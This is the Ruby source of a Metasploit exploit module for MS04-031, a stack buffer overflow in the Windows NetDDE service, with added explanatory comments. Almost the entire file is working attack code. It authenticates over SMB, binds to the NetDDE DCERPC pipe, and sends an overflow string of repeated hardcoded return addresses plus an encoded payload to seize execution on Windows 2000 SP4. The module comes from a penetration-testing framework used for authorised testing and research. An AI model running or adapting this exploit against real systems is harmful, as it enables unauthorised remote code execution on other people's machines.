##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
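# Exploit module for MS04-031 (CVE-2004-0206), a stack buffer overflow in the
# Windows NetDDE service reached over the NDDEAPI named pipe. Per the module
# description the pipe is only reachable after SMB authentication, and only
# systems released before Windows XP SP1 (2000 SP4, XP SP0) are affected; the
# vendor fix is the MS04-031 bulletin listed in the References.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Registers the module metadata (name, references, payload constraints, the
  # single Windows 2000 SP4 target) and the SMBPIPE option.
  #
  # @param info [Hash] module info merged via Msf::Exploit#update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS04-031 Microsoft NetDDE Service Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the NetDDE service, which is the
          precursor to the DCOM interface. This exploit effects only operating systems
          released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim
          that this vulnerability can be exploited without authentication, the NDDEAPI
          pipe is only accessible after successful authentication.
        },
        'Author' => [ 'pusscat' ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2004-0206'],
          [ 'OSVDB', '10689'],
          [ 'BID', '11372'],
          [ 'MSB', 'MS04-031'],

        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Payload' => {
          # 0x600 less the 133 return-address copies and one extra long that
          # #exploit places in the request (the leading 'AA' and the second
          # trailer long are not subtracted here -- verify if space is tight).
          'Space' => (0x600 - (133 * 4) - 4),
          'BadChars' => "\\/.:$\x00", # \ / . : $ NULL
          'Prepend' => 'A' * 8,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ], # push esp, ret :)
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-10-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (nddeapi)", 'nddeapi']),
      ]
    )
  end

  # Authenticates over SMB, binds to the NetDDE DCERPC interface on the
  # configured pipe and sends the oversized string argument to opnum 0xc.
  #
  # The request is a pre-built Unicode conformant/varying string consisting of
  # 'AA', 133 copies of the target return address, the encoded payload and two
  # trailer longs, followed by a random long. Any DCERPC error other than a
  # missing reply propagates to the framework.
  def exploit
    connect
    smb_login
    print_status("Trying target #{target.name}...")

    handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    # 133 copies of the return address (push esp / ret per the target comment)
    # followed by the encoded payload.
    ret_overwrite =
      'AA' + (NDR.long(target.ret) * 133) + payload.encoded

    overflow_chunk =
      ret_overwrite +
      NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
      NDR.long(0x0)

    stubdata =
      NDR.UnicodeConformantVaryingStringPreBuilt(overflow_chunk) +
      NDR.long(rand(0xFFFFFFFF))

    print_status('Calling the vulnerable function...')

    begin
      dcerpc.call(0xc, stubdata)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # A missing DCERPC reply is tolerated on purpose: the service is not
      # expected to answer normally once the overflow has been triggered, so
      # the module proceeds to the handler rather than failing here.
    end

    handler
    disconnect
  end
end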